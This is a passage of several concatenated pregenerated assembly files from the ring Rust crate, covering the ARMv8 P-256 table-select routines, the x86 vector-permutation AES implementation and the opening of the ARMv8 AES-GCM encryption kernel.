movi v19.16b, #0
movi v20.16b, #0
movi v21.16b, #0
.Lselect_w5_loop:
// Loop 16 times.
// Increment index (loop counter); tested at the end of the loop
add w9, w9, #1
// [v22-v27] := Load a (3*256-bit = 6*128-bit) table entry starting at x1
// and advance x1 to point to the next entry
ld1 {v22.2d, v23.2d, v24.2d, v25.2d}, [x1],#64
// x11 := (w9 == w2)? All 1s : All 0s
cmp w9, w2
csetm x11, eq
// continue loading ...
ld1 {v26.2d, v27.2d}, [x1],#32
// duplicate mask_64 into Mask (all 0s or all 1s)
dup v3.2d, x11
// [v16-v19] := (Mask == all 1s)? [v22-v25] : [v16-v19]
// i.e., values in output registers will remain the same if w9 != w2
bit v16.16b, v22.16b, v3.16b
bit v17.16b, v23.16b, v3.16b
bit v18.16b, v24.16b, v3.16b
bit v19.16b, v25.16b, v3.16b
bit v20.16b, v26.16b, v3.16b
bit v21.16b, v27.16b, v3.16b
// If bit #4 is not 0 (i.e. idx_ctr < 16) loop back
tbz w9, #4, .Lselect_w5_loop
// Write [v16-v21] to memory at the output pointer
st1 {v16.2d, v17.2d, v18.2d, v19.2d}, [x10],#64
st1 {v20.2d, v21.2d}, [x10]
ret
.size ecp_nistz256_select_w5,.-ecp_nistz256_select_w5
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_select_w7(uint64_t *val, uint64_t *in_t, int index);
.globl ecp_nistz256_select_w7
.hidden ecp_nistz256_select_w7
.type ecp_nistz256_select_w7,%function
.align 4
ecp_nistz256_select_w7:
AARCH64_VALID_CALL_TARGET
// w9 := 0; loop counter and incremented internal index
mov w9, #0
// [v16-v21] := 0
movi v16.16b, #0
movi v17.16b, #0
movi v18.16b, #0
movi v19.16b, #0
.Lselect_w7_loop:
// Loop 64 times.
// Increment index (loop counter); tested at the end of the loop
add w9, w9, #1
// [v22-v25] := Load a (2*256-bit = 4*128-bit) table entry starting at x1
// and advance x1 to point to the next entry
ld1 {v22.2d, v23.2d, v24.2d, v25.2d}, [x1],#64
// x11 := (w9 == w2)? All 1s : All 0s
cmp w9, w2
csetm x11, eq
// duplicate mask_64 into Mask (all 0s or all 1s)
dup v3.2d, x11
// [v16-v19] := (Mask == all 1s)? [v22-v25] : [v16-v19]
// i.e., values in output registers will remain the same if w9 != w2
bit v16.16b, v22.16b, v3.16b
bit v17.16b, v23.16b, v3.16b
bit v18.16b, v24.16b, v3.16b
bit v19.16b, v25.16b, v3.16b
// If bit #6 is not 0 (i.e. idx_ctr < 64) loop back
tbz w9, #6, .Lselect_w7_loop
// Write [v16-v19] to memory at the output pointer
st1 {v16.2d, v17.2d, v18.2d, v19.2d}, [x0]
ret
.size ecp_nistz256_select_w7,.-ecp_nistz256_select_w7
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__ELF__)
|
mi2bjss/Pressel-site | 9,958 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/vpaes-x86-elf.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86) && defined(__ELF__)
.text
#ifdef BORINGSSL_DISPATCH_TEST
#endif
.align 64
.L_vpaes_consts:
.long 218628480,235210255,168496130,67568393
.long 252381056,17041926,33884169,51187212
.long 252645135,252645135,252645135,252645135
.long 1512730624,3266504856,1377990664,3401244816
.long 830229760,1275146365,2969422977,3447763452
.long 3411033600,2979783055,338359620,2782886510
.long 4209124096,907596821,221174255,1006095553
.long 191964160,3799684038,3164090317,1589111125
.long 182528256,1777043520,2877432650,3265356744
.long 1874708224,3503451415,3305285752,363511674
.long 1606117888,3487855781,1093350906,2384367825
.long 197121,67569157,134941193,202313229
.long 67569157,134941193,202313229,197121
.long 134941193,202313229,197121,67569157
.long 202313229,197121,67569157,134941193
.long 33619971,100992007,168364043,235736079
.long 235736079,33619971,100992007,168364043
.long 168364043,235736079,33619971,100992007
.long 100992007,168364043,235736079,33619971
.long 50462976,117835012,185207048,252579084
.long 252314880,51251460,117574920,184942860
.long 184682752,252054788,50987272,118359308
.long 118099200,185467140,251790600,50727180
.long 2946363062,528716217,1300004225,1881839624
.long 1532713819,1532713819,1532713819,1532713819
.long 3602276352,4288629033,3737020424,4153884961
.long 1354558464,32357713,2958822624,3775749553
.long 1201988352,132424512,1572796698,503232858
.long 2213177600,1597421020,4103937655,675398315
.byte 86,101,99,116,111,114,32,80,101,114,109,117,116,97,116,105
.byte 111,110,32,65,69,83,32,102,111,114,32,120,56,54,47,83
.byte 83,83,69,51,44,32,77,105,107,101,32,72,97,109,98,117
.byte 114,103,32,40,83,116,97,110,102,111,114,100,32,85,110,105
.byte 118,101,114,115,105,116,121,41,0
.align 64
.hidden _vpaes_preheat
.type _vpaes_preheat,@function
.align 16
_vpaes_preheat:
addl (%esp),%ebp
movdqa -48(%ebp),%xmm7
movdqa -16(%ebp),%xmm6
ret
.size _vpaes_preheat,.-_vpaes_preheat
.hidden _vpaes_encrypt_core
.type _vpaes_encrypt_core,@function
.align 16
_vpaes_encrypt_core:
movl $16,%ecx
movl 240(%edx),%eax
movdqa %xmm6,%xmm1
movdqa (%ebp),%xmm2
pandn %xmm0,%xmm1
pand %xmm6,%xmm0
movdqu (%edx),%xmm5
.byte 102,15,56,0,208
movdqa 16(%ebp),%xmm0
pxor %xmm5,%xmm2
psrld $4,%xmm1
addl $16,%edx
.byte 102,15,56,0,193
leal 192(%ebp),%ebx
pxor %xmm2,%xmm0
jmp .L000enc_entry
.align 16
.L001enc_loop:
movdqa 32(%ebp),%xmm4
movdqa 48(%ebp),%xmm0
.byte 102,15,56,0,226
.byte 102,15,56,0,195
pxor %xmm5,%xmm4
movdqa 64(%ebp),%xmm5
pxor %xmm4,%xmm0
movdqa -64(%ebx,%ecx,1),%xmm1
.byte 102,15,56,0,234
movdqa 80(%ebp),%xmm2
movdqa (%ebx,%ecx,1),%xmm4
.byte 102,15,56,0,211
movdqa %xmm0,%xmm3
pxor %xmm5,%xmm2
.byte 102,15,56,0,193
addl $16,%edx
pxor %xmm2,%xmm0
.byte 102,15,56,0,220
addl $16,%ecx
pxor %xmm0,%xmm3
.byte 102,15,56,0,193
andl $48,%ecx
subl $1,%eax
pxor %xmm3,%xmm0
.L000enc_entry:
movdqa %xmm6,%xmm1
movdqa -32(%ebp),%xmm5
pandn %xmm0,%xmm1
psrld $4,%xmm1
pand %xmm6,%xmm0
.byte 102,15,56,0,232
movdqa %xmm7,%xmm3
pxor %xmm1,%xmm0
.byte 102,15,56,0,217
movdqa %xmm7,%xmm4
pxor %xmm5,%xmm3
.byte 102,15,56,0,224
movdqa %xmm7,%xmm2
pxor %xmm5,%xmm4
.byte 102,15,56,0,211
movdqa %xmm7,%xmm3
pxor %xmm0,%xmm2
.byte 102,15,56,0,220
movdqu (%edx),%xmm5
pxor %xmm1,%xmm3
jnz .L001enc_loop
movdqa 96(%ebp),%xmm4
movdqa 112(%ebp),%xmm0
.byte 102,15,56,0,226
pxor %xmm5,%xmm4
.byte 102,15,56,0,195
movdqa 64(%ebx,%ecx,1),%xmm1
pxor %xmm4,%xmm0
.byte 102,15,56,0,193
ret
.size _vpaes_encrypt_core,.-_vpaes_encrypt_core
.hidden _vpaes_schedule_core
.type _vpaes_schedule_core,@function
.align 16
_vpaes_schedule_core:
addl (%esp),%ebp
movdqu (%esi),%xmm0
movdqa 320(%ebp),%xmm2
movdqa %xmm0,%xmm3
leal (%ebp),%ebx
movdqa %xmm2,4(%esp)
call _vpaes_schedule_transform
movdqa %xmm0,%xmm7
testl %edi,%edi
jnz .L002schedule_am_decrypting
movdqu %xmm0,(%edx)
jmp .L003schedule_go
.L002schedule_am_decrypting:
movdqa 256(%ebp,%ecx,1),%xmm1
.byte 102,15,56,0,217
movdqu %xmm3,(%edx)
xorl $48,%ecx
.L003schedule_go:
cmpl $192,%eax
ja .L004schedule_256
.L005schedule_128:
movl $10,%eax
.L006loop_schedule_128:
call _vpaes_schedule_round
decl %eax
jz .L007schedule_mangle_last
call _vpaes_schedule_mangle
jmp .L006loop_schedule_128
.align 16
.L004schedule_256:
movdqu 16(%esi),%xmm0
call _vpaes_schedule_transform
movl $7,%eax
.L008loop_schedule_256:
call _vpaes_schedule_mangle
movdqa %xmm0,%xmm6
call _vpaes_schedule_round
decl %eax
jz .L007schedule_mangle_last
call _vpaes_schedule_mangle
pshufd $255,%xmm0,%xmm0
movdqa %xmm7,20(%esp)
movdqa %xmm6,%xmm7
call .L_vpaes_schedule_low_round
movdqa 20(%esp),%xmm7
jmp .L008loop_schedule_256
.align 16
.L007schedule_mangle_last:
leal 384(%ebp),%ebx
testl %edi,%edi
jnz .L009schedule_mangle_last_dec
movdqa 256(%ebp,%ecx,1),%xmm1
.byte 102,15,56,0,193
leal 352(%ebp),%ebx
addl $32,%edx
.L009schedule_mangle_last_dec:
addl $-16,%edx
pxor 336(%ebp),%xmm0
call _vpaes_schedule_transform
movdqu %xmm0,(%edx)
pxor %xmm0,%xmm0
pxor %xmm1,%xmm1
pxor %xmm2,%xmm2
pxor %xmm3,%xmm3
pxor %xmm4,%xmm4
pxor %xmm5,%xmm5
pxor %xmm6,%xmm6
pxor %xmm7,%xmm7
ret
.size _vpaes_schedule_core,.-_vpaes_schedule_core
.hidden _vpaes_schedule_round
.type _vpaes_schedule_round,@function
.align 16
_vpaes_schedule_round:
movdqa 8(%esp),%xmm2
pxor %xmm1,%xmm1
.byte 102,15,58,15,202,15
.byte 102,15,58,15,210,15
pxor %xmm1,%xmm7
pshufd $255,%xmm0,%xmm0
.byte 102,15,58,15,192,1
movdqa %xmm2,8(%esp)
.L_vpaes_schedule_low_round:
movdqa %xmm7,%xmm1
pslldq $4,%xmm7
pxor %xmm1,%xmm7
movdqa %xmm7,%xmm1
pslldq $8,%xmm7
pxor %xmm1,%xmm7
pxor 336(%ebp),%xmm7
movdqa -16(%ebp),%xmm4
movdqa -48(%ebp),%xmm5
movdqa %xmm4,%xmm1
pandn %xmm0,%xmm1
psrld $4,%xmm1
pand %xmm4,%xmm0
movdqa -32(%ebp),%xmm2
.byte 102,15,56,0,208
pxor %xmm1,%xmm0
movdqa %xmm5,%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
movdqa %xmm5,%xmm4
.byte 102,15,56,0,224
pxor %xmm2,%xmm4
movdqa %xmm5,%xmm2
.byte 102,15,56,0,211
pxor %xmm0,%xmm2
movdqa %xmm5,%xmm3
.byte 102,15,56,0,220
pxor %xmm1,%xmm3
movdqa 32(%ebp),%xmm4
.byte 102,15,56,0,226
movdqa 48(%ebp),%xmm0
.byte 102,15,56,0,195
pxor %xmm4,%xmm0
pxor %xmm7,%xmm0
movdqa %xmm0,%xmm7
ret
.size _vpaes_schedule_round,.-_vpaes_schedule_round
.hidden _vpaes_schedule_transform
.type _vpaes_schedule_transform,@function
.align 16
_vpaes_schedule_transform:
movdqa -16(%ebp),%xmm2
movdqa %xmm2,%xmm1
pandn %xmm0,%xmm1
psrld $4,%xmm1
pand %xmm2,%xmm0
movdqa (%ebx),%xmm2
.byte 102,15,56,0,208
movdqa 16(%ebx),%xmm0
.byte 102,15,56,0,193
pxor %xmm2,%xmm0
ret
.size _vpaes_schedule_transform,.-_vpaes_schedule_transform
.hidden _vpaes_schedule_mangle
.type _vpaes_schedule_mangle,@function
.align 16
_vpaes_schedule_mangle:
movdqa %xmm0,%xmm4
movdqa 128(%ebp),%xmm5
testl %edi,%edi
jnz .L010schedule_mangle_dec
addl $16,%edx
pxor 336(%ebp),%xmm4
.byte 102,15,56,0,229
movdqa %xmm4,%xmm3
.byte 102,15,56,0,229
pxor %xmm4,%xmm3
.byte 102,15,56,0,229
pxor %xmm4,%xmm3
jmp .L011schedule_mangle_both
.align 16
.L010schedule_mangle_dec:
movdqa -16(%ebp),%xmm2
leal (%ebp),%esi
movdqa %xmm2,%xmm1
pandn %xmm4,%xmm1
psrld $4,%xmm1
pand %xmm2,%xmm4
movdqa (%esi),%xmm2
.byte 102,15,56,0,212
movdqa 16(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
.byte 102,15,56,0,221
movdqa 32(%esi),%xmm2
.byte 102,15,56,0,212
pxor %xmm3,%xmm2
movdqa 48(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
.byte 102,15,56,0,221
movdqa 64(%esi),%xmm2
.byte 102,15,56,0,212
pxor %xmm3,%xmm2
movdqa 80(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
.byte 102,15,56,0,221
movdqa 96(%esi),%xmm2
.byte 102,15,56,0,212
pxor %xmm3,%xmm2
movdqa 112(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
addl $-16,%edx
.L011schedule_mangle_both:
movdqa 256(%ebp,%ecx,1),%xmm1
.byte 102,15,56,0,217
addl $-16,%ecx
andl $48,%ecx
movdqu %xmm3,(%edx)
ret
.size _vpaes_schedule_mangle,.-_vpaes_schedule_mangle
.globl vpaes_set_encrypt_key
.hidden vpaes_set_encrypt_key
.type vpaes_set_encrypt_key,@function
.align 16
vpaes_set_encrypt_key:
.L_vpaes_set_encrypt_key_begin:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
#ifdef BORINGSSL_DISPATCH_TEST
pushl %ebx
pushl %edx
call .L012pic_for_function_hit
.L012pic_for_function_hit:
popl %ebx
leal BORINGSSL_function_hit+5-.L012pic_for_function_hit(%ebx),%ebx
movl $1,%edx
movb %dl,(%ebx)
popl %edx
popl %ebx
#endif
movl 20(%esp),%esi
leal -56(%esp),%ebx
movl 24(%esp),%eax
andl $-16,%ebx
movl 28(%esp),%edx
xchgl %esp,%ebx
movl %ebx,48(%esp)
movl %eax,%ebx
shrl $5,%ebx
addl $5,%ebx
movl %ebx,240(%edx)
movl $48,%ecx
movl $0,%edi
leal .L_vpaes_consts+0x30-.L013pic_point,%ebp
call _vpaes_schedule_core
.L013pic_point:
movl 48(%esp),%esp
xorl %eax,%eax
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
.size vpaes_set_encrypt_key,.-.L_vpaes_set_encrypt_key_begin
.globl vpaes_encrypt
.hidden vpaes_encrypt
.type vpaes_encrypt,@function
.align 16
vpaes_encrypt:
.L_vpaes_encrypt_begin:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
#ifdef BORINGSSL_DISPATCH_TEST
pushl %ebx
pushl %edx
call .L014pic_for_function_hit
.L014pic_for_function_hit:
popl %ebx
leal BORINGSSL_function_hit+4-.L014pic_for_function_hit(%ebx),%ebx
movl $1,%edx
movb %dl,(%ebx)
popl %edx
popl %ebx
#endif
leal .L_vpaes_consts+0x30-.L015pic_point,%ebp
call _vpaes_preheat
.L015pic_point:
movl 20(%esp),%esi
leal -56(%esp),%ebx
movl 24(%esp),%edi
andl $-16,%ebx
movl 28(%esp),%edx
xchgl %esp,%ebx
movl %ebx,48(%esp)
movdqu (%esi),%xmm0
call _vpaes_encrypt_core
movdqu %xmm0,(%edi)
movl 48(%esp),%esp
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
.size vpaes_encrypt,.-.L_vpaes_encrypt_begin
#endif // !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86) && defined(__ELF__)
|
mi2bjss/Pressel-site | 82,152 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/aesv8-gcm-armv8-ios64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__APPLE__)
#if __ARM_MAX_ARCH__ >= 8
.text
.globl _aes_gcm_enc_kernel
.private_extern _aes_gcm_enc_kernel
.align 4
_aes_gcm_enc_kernel:
AARCH64_SIGN_LINK_REGISTER
stp x29, x30, [sp, #-128]!
mov x29, sp
stp x19, x20, [sp, #16]
mov x16, x4
mov x8, x5
stp x21, x22, [sp, #32]
stp x23, x24, [sp, #48]
stp d8, d9, [sp, #64]
stp d10, d11, [sp, #80]
stp d12, d13, [sp, #96]
stp d14, d15, [sp, #112]
ldr w17, [x8, #240]
add x19, x8, x17, lsl #4 // borrow input_l1 for last key
ldp x13, x14, [x19] // load round N keys
ldr q31, [x19, #-16] // load round N-1 keys
add x4, x0, x1, lsr #3 // end_input_ptr
lsr x5, x1, #3 // byte_len
mov x15, x5
ldp x10, x11, [x16] // ctr96_b64, ctr96_t32
ld1 { v0.16b}, [x16] // special case vector load initial counter so we can start first AES block as quickly as possible
sub x5, x5, #1 // byte_len - 1
ldr q18, [x8, #0] // load rk0
and x5, x5, #0xffffffffffffffc0 // number of bytes to be processed in main loop (at least 1 byte must be handled by tail)
ldr q25, [x8, #112] // load rk7
add x5, x5, x0
lsr x12, x11, #32
fmov d2, x10 // CTR block 2
orr w11, w11, w11
rev w12, w12 // rev_ctr32
fmov d1, x10 // CTR block 1
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 0 - round 0
add w12, w12, #1 // increment rev_ctr32
rev w9, w12 // CTR block 1
fmov d3, x10 // CTR block 3
orr x9, x11, x9, lsl #32 // CTR block 1
add w12, w12, #1 // CTR block 1
ldr q19, [x8, #16] // load rk1
fmov v1.d[1], x9 // CTR block 1
rev w9, w12 // CTR block 2
add w12, w12, #1 // CTR block 2
orr x9, x11, x9, lsl #32 // CTR block 2
ldr q20, [x8, #32] // load rk2
fmov v2.d[1], x9 // CTR block 2
rev w9, w12 // CTR block 3
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 0 - round 1
orr x9, x11, x9, lsl #32 // CTR block 3
fmov v3.d[1], x9 // CTR block 3
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 1 - round 0
ldr q21, [x8, #48] // load rk3
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 0 - round 2
ldr q24, [x8, #96] // load rk6
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 2 - round 0
ldr q23, [x8, #80] // load rk5
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 1 - round 1
ldr q14, [x6, #48] // load h3l | h3h
ext v14.16b, v14.16b, v14.16b, #8
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 3 - round 0
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 2 - round 1
ldr q22, [x8, #64] // load rk4
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 1 - round 2
ldr q13, [x6, #32] // load h2l | h2h
ext v13.16b, v13.16b, v13.16b, #8
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 3 - round 1
ldr q30, [x8, #192] // load rk12
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 2 - round 2
ldr q15, [x6, #80] // load h4l | h4h
ext v15.16b, v15.16b, v15.16b, #8
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 1 - round 3
ldr q29, [x8, #176] // load rk11
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 3 - round 2
ldr q26, [x8, #128] // load rk8
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 2 - round 3
add w12, w12, #1 // CTR block 3
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 0 - round 3
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 3 - round 3
ld1 { v11.16b}, [x3]
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 2 - round 4
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 0 - round 4
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 1 - round 4
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 3 - round 4
cmp x17, #12 // setup flags for AES-128/192/256 check
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 0 - round 5
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 1 - round 5
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 3 - round 5
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 2 - round 5
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 1 - round 6
trn2 v17.2d, v14.2d, v15.2d // h4l | h3l
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 3 - round 6
ldr q27, [x8, #144] // load rk9
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 0 - round 6
ldr q12, [x6] // load h1l | h1h
ext v12.16b, v12.16b, v12.16b, #8
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 2 - round 6
ldr q28, [x8, #160] // load rk10
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 1 - round 7
trn1 v9.2d, v14.2d, v15.2d // h4h | h3h
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 0 - round 7
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 2 - round 7
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 3 - round 7
trn2 v16.2d, v12.2d, v13.2d // h2l | h1l
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 1 - round 8
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 2 - round 8
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 3 - round 8
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 0 - round 8
b.lt Lenc_finish_first_blocks // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 1 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 2 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 3 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 0 - round 9
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 1 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 2 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 3 - round 10
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 0 - round 10
b.eq Lenc_finish_first_blocks // branch if AES-192
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 1 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 2 - round 11
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 0 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 3 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 1 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 2 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 0 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 3 - round 12
Lenc_finish_first_blocks:
cmp x0, x5 // check if we have <= 4 blocks
eor v17.16b, v17.16b, v9.16b // h4k | h3k
aese v2.16b, v31.16b // AES block 2 - round N-1
trn1 v8.2d, v12.2d, v13.2d // h2h | h1h
aese v1.16b, v31.16b // AES block 1 - round N-1
aese v0.16b, v31.16b // AES block 0 - round N-1
aese v3.16b, v31.16b // AES block 3 - round N-1
eor v16.16b, v16.16b, v8.16b // h2k | h1k
b.ge Lenc_tail // handle tail
ldp x19, x20, [x0, #16] // AES block 1 - load plaintext
rev w9, w12 // CTR block 4
ldp x6, x7, [x0, #0] // AES block 0 - load plaintext
ldp x23, x24, [x0, #48] // AES block 3 - load plaintext
ldp x21, x22, [x0, #32] // AES block 2 - load plaintext
add x0, x0, #64 // AES input_ptr update
eor x19, x19, x13 // AES block 1 - round N low
eor x20, x20, x14 // AES block 1 - round N high
fmov d5, x19 // AES block 1 - mov low
eor x6, x6, x13 // AES block 0 - round N low
eor x7, x7, x14 // AES block 0 - round N high
eor x24, x24, x14 // AES block 3 - round N high
fmov d4, x6 // AES block 0 - mov low
cmp x0, x5 // check if we have <= 8 blocks
fmov v4.d[1], x7 // AES block 0 - mov high
eor x23, x23, x13 // AES block 3 - round N low
eor x21, x21, x13 // AES block 2 - round N low
fmov v5.d[1], x20 // AES block 1 - mov high
fmov d6, x21 // AES block 2 - mov low
add w12, w12, #1 // CTR block 4
orr x9, x11, x9, lsl #32 // CTR block 4
fmov d7, x23 // AES block 3 - mov low
eor x22, x22, x14 // AES block 2 - round N high
fmov v6.d[1], x22 // AES block 2 - mov high
eor v4.16b, v4.16b, v0.16b // AES block 0 - result
fmov d0, x10 // CTR block 4
fmov v0.d[1], x9 // CTR block 4
rev w9, w12 // CTR block 5
add w12, w12, #1 // CTR block 5
eor v5.16b, v5.16b, v1.16b // AES block 1 - result
fmov d1, x10 // CTR block 5
orr x9, x11, x9, lsl #32 // CTR block 5
fmov v1.d[1], x9 // CTR block 5
rev w9, w12 // CTR block 6
st1 { v4.16b}, [x2], #16 // AES block 0 - store result
fmov v7.d[1], x24 // AES block 3 - mov high
orr x9, x11, x9, lsl #32 // CTR block 6
eor v6.16b, v6.16b, v2.16b // AES block 2 - result
st1 { v5.16b}, [x2], #16 // AES block 1 - store result
add w12, w12, #1 // CTR block 6
fmov d2, x10 // CTR block 6
fmov v2.d[1], x9 // CTR block 6
st1 { v6.16b}, [x2], #16 // AES block 2 - store result
rev w9, w12 // CTR block 7
orr x9, x11, x9, lsl #32 // CTR block 7
eor v7.16b, v7.16b, v3.16b // AES block 3 - result
st1 { v7.16b}, [x2], #16 // AES block 3 - store result
b.ge Lenc_prepretail // do prepretail
Lenc_main_loop: // main loop start
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
rev64 v4.16b, v4.16b // GHASH block 4k (only t0 is free)
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
fmov d3, x10 // CTR block 4k+3
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
fmov v3.d[1], x9 // CTR block 4k+3
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
ldp x23, x24, [x0, #48] // AES block 4k+7 - load plaintext
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
ldp x21, x22, [x0, #32] // AES block 4k+6 - load plaintext
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
eor v4.16b, v4.16b, v11.16b // PRE 1
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
eor x23, x23, x13 // AES block 4k+7 - round N low
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
mov d10, v17.d[1] // GHASH block 4k - mid
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
eor x22, x22, x14 // AES block 4k+6 - round N high
mov d8, v4.d[1] // GHASH block 4k - mid
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
rev64 v5.16b, v5.16b // GHASH block 4k+1 (t0 and t1 free)
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
rev64 v7.16b, v7.16b // GHASH block 4k+3 (t0, t1, t2 and t3 free)
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
rev64 v6.16b, v6.16b // GHASH block 4k+2 (t0, t1, and t2 free)
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
aese v0.16b, v26.16b
